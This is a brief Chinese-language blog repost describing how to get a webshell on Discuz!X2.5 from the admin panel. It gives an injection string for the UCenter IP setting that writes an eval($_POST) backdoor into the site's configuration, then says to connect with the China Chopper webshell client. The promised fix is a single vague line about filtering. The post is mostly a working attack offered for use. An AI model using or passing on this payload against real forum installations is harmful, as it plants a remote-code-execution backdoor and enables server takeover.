Discuz!X2.5最新版后台管理员权限Getshell及修复

		Discuz!X2.5最新版后台管理员权限Getshell。

  
    
    
    
    
 
1.在后台--> 站长-->Ucenter设置处设置UcenterIP为
XX\\');eval($_POST[a])?>;// XX
 
2.发现管理页面代码出来了
 
3.上菜刀!
 
4.看一下 源码,哦,原来是这样的!
 

 
修复方案:
过滤你懂的


本文章来至源码世界   http://www.ymsky.net/views/100779.shtml

你可能感兴趣的:(shell,discuz,源码,管理,javascript,session)